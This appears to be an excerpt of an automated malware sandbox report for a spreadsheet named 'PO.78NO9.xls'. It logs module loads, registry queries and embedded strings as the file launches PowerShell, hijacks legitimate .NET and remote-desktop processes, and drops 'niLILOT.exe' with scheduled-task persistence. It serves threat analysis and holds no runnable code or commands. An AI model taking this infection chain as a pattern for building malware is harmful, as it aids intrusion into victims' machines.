      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wow64win.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: wow64cpu.dll
      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
      Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dll
      Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dll
      Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dll
      Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dll
      Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dll
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeSection loaded: wow64win.dll
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeSection loaded: wow64cpu.dll
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeSection loaded: version.dll
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wow64win.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wow64cpu.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winhttp.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: webio.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: credui.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: secur32.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptui.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netapi32.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wkscli.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winmm.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winnsi.dll
      Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dll
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dll
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: PO.78NO9.xlsStatic file information: File size 1095168 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000F.00000002.480635690.00000000023D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 00000016.00000002.512818584.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000001B.00000002.637891163.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000003.511016346.0000000001EE0000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000003.512113443.0000000002040000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637891163.0000000002350000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: aspnet_regbrowsers.pdb source: explorer.exe, 00000017.00000002.639143250.000000000878F000.00000004.80000000.00040000.00000000.sdmp, niLILOT.exe, 00000019.00000000.488929503.0000000000332000.00000020.00000001.01000000.0000000A.sdmp, mstsc.exe, 0000001B.00000002.638080396.00000000026CF000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 0000001B.00000002.637568604.000000000037D000.00000004.00000020.00020000.00000000.sdmp, niLILOT.exe.17.dr
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: mstsc.pdb source: aspnet_regbrowsers.exe, 00000016.00000002.512368653.00000000008A0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: BKsn.pdbSHA256z source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000F.00000002.480635690.00000000023D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.479528162.0000000000299000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.pdb source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: BKsn.pdb source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000F.00000002.494192493.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.486232559.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
